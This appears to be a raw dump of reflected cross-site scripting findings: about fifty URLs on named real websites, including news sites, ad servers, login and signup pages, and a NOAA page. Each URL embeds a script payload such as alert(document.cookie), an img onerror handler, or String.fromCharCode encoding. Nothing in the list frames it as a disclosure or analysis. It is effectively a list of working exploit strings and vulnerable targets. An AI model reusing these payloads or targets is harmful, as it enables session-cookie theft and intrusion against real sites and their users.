.	http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1
.	http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1
.	http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910c7bc4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea0ea45578b5&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y
.	http://aserve.directorym.com/ModuleG.aspx?dm_affiliate=448e5948';alert(String.fromCharCode(88,83,83))//81e894ba1c7&dm_size=336x280&dm_color_border=66CC99&dm_color_title=000000&dm_color_links=000000&dm_color_background=FFFFFF&dm_set_categorylist=&dm_set_categoryexcludelist=&dm_set_autoregion=no&dm_set_regionlist=&dm_set_regionexcludelist=&dm_set_topic=technology&dm_open_in_new_window=&dm_link_url=
.	http://www.food.com/?8ce18%22-alert(document.cookie)-%2228d313d23df=1
.	http://blog.cookingchanneltv.com/2011/02/03/untrapped-the-anti-tourists-guide-to-venice-with-jamie-oliver3cbfd%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4a34c66f6ba/
.	http://my.foodnetwork.com/registration/register_lite.esi?DEST_URL=http://www.foodnetwork.com/app/food/mrb/myrecipes/index.do?applicationId=MY-RECIPE-BOX2cb53%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5036fd5a7a5
.	http://info.lycos.com/tos.php/ae929%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E70fe457df73


.	http://videos.howstuffworks.com/search.php?947f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8f546c63ec0=1
.	http://utm.alibaba.com/cm/hotproduct9d966%3Cscript%3Ealert(document.cookie)%3C/script%3E1edee7f7ef2/hotProducts.js?memberId=&cookieId=&tn=&encrypt=y&valueName=utmReturnValue_4&source=aisn&todaysNewHomeVersion=&date=Mon%20Feb%2021%202011%2007:43:07%20GMT-0600%20(Central%20Standard%20Time)&country=US
.	http://support.camerontec.com/index.php/css/blueprint/screen.cssa7a18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E977b917c429
.	http://www.4shared.com/signUpBox.jsp?df='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&login=3&months=1&password=3&password2=3&planSelect=1&resetDirView=3
.	http://www.wrh.noaa.gov/sew/main.php/ff97e%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E4bc70615a2f
.	https://www.demandstudios.com/application.html?role=Writerdbaf0';alert(document.cookie)//3aa185a0bce&utm_source=DemandMedia&utm_medium=site&utm_campaign=writer
.	http://projects.webappsec.org/w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria57c86%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E64ff6fcbc40
.	http://uid.shoplocal.com/uid.aspx?callback=json_results45a5f%3Cscript%3Ealert(document.cookie)%3C/script%3E72002c4d70c
.	https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start?ProductRef=jdk-6u24-oth-JPR@CDS-CDS_Developer&6855a--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc4102ec8a7=1
.	https://client.trafficshaping.com/signin?email=1b192%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E32cca89645832eced&password=&action=login
.	http://login.howstuffworks.com/registration/how-stuff-works/register.html?site=DORA&a=register&c=HSW&oc=e8346%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed68588a82d6
.	http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=229200155519e8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4642e4bf25f&cid=RSSfeed_IWK_News
.	http://www.itbusinessedge.com/cm/community/news/sec/blog/microsoft-warns-of-windows-mhtml-xss-vulnerability/?cs=45331&60a70%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E2feb06588c5=1
.	http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1c5367c1276627aae?action=docheck&urlo=http://cloudscan.us&submit=Check+PR
.	http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css
.	http://comments.csoonline.com/files/csocomments_favicon.ico?78001%22-alert(document.cookie)-%223356cf7e2ee=1
.	http://weekly-prizes.com/?aff=154ced24%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E1330ed82d58&subid=&pop=0&r=1&sound=1&sid=1001
.	http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csozne&tab=18ce37%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E810f4ffdf43&item=5
.	http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac/page-1/
.	http://klout.com/?4facd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8ccd61759dc=1


.	http://rtb0.doubleverify.com/rtb.ashx/verifyc?ctx=741233&cmp=5027088&plc=56548503&sid=953349&num=1&ver=4&dv_url=http://www.komonews.com/&callback=__verify_callback_2587954816405975d%3Cscript%3Ealert(1)%3C/script%3E8e27cf83e0e
.	http://www.virtusa.com/applications/userlogin/userlogin.asp?fn=practicebrochure/DWBIPR-PB-0410.pdfc59a7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E562a4528863&iframe
.	https://sso.springsource.com/cas/login?38852--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef4d8a81df54=1
.	http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=1172a81%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E567e449ac8d&provider=765295
.	http://www.123count.com/37de3'-alert(document.cookie)-'9be839d0a09?webpass:1::::1920x1200::16::::::0.06353209936060011::http://web-pass.com/
.	http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html?current_tab=projects&current_sub_tab='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000201)%3C/script%3E
.	http://directorym.com/?e0ec2%22-alert(document.cookie)-%2268a0f1fc021=1
.	http://dailycaller.com/?c20fc%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1676ef044e4=1
.	http://www.caribbean-ocean.com/luxury%20Bermuda%20Resort%20holidays/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000905)%3C/script%3E
.	http://qap.questcdn.com/qap/action/IPPshowProjData?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001F9)%3C/script%3E
.	https://pro.vembu.com/account.php?page=login&error=43104%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9ae1100b3a8
.	http://www.savvis.com/_layouts/SavvisUtilities/BreadCrumb.aspx?text=Solutions9897f%3Cscript%3Ealert(String.fromCharCode(88,83,83,32,72,79,89,84,32,76,76,67,32,82,69,83,69,65,82,67,72))%3C/script%3E29e80fc9d2a&url=http://www.savvis.com/en-US/Solutions/Pages/Home.aspx
.	http://www.schneider-electric.com/sites/corporate/en/products-services/electrical-distribution/electrical-distribution.page?f=F13:Electrical%20Distributiona88b2%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6c5dd40e551
.	http://www.integratelecom.com/care/webmail.php/337f4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5ae1561966d
.	http://hosting.elihosting.net/OS4/index.php/Utilb48a6%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E60a918c2c13/Javascript?app=Login&ver=current&js=Login.js
.	http://ads.dotomi.com/ads.php?pid=12783&mtg=0&ms=18c388c';alert(document.cookie)//021f311ca71&btg=1&mp=1&dres=iframe&rwidth=728&rheight=90&pp=0&cg=42&tz=360
.	http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BXHXNHTtyTc3sEcqGlget8L3KBpWpie8BhaKK8hLjqLazM6DUkgIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAVFmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3NxbC1pbmplY3Rpb24teHNzLWZldGNoZG9nY29tLWN3ZTc5LWN3ZTg5Lmh0bWy4AhjAAgXIAuXvxRioAwHRA03G05dUI6-R6AP2BugDswToA_IG9QMAAADE&num=1&sig=AGiWqtxkKZPosMFRS4XthGZnKkwh1QqVnw&client=ca-pub-4063878933780912&adurl=406ba%22-alert(document.cookie)-%22f32a8385649
.	http://www.fstsummiteurope.com/protected.php?return=9b7c6%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed22ba750c7c&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000069)%3C/script%3E
.	http://travaux.ovh.net/?2dc7b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed6f03fe4629=1
.	http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04


.	http://www.thestar.com/Toplets/User?469d2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea4549f98675=1
.	http://www.eff.org/br54acd%22%3E%3Cimg%20src%3da%20onerror%3dalert(String.fromCharCode(88,83,83))%3E28d7556c99a/brstrip.gif
.	http://csscreator.com/topic/center-site32bfb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea0943c43709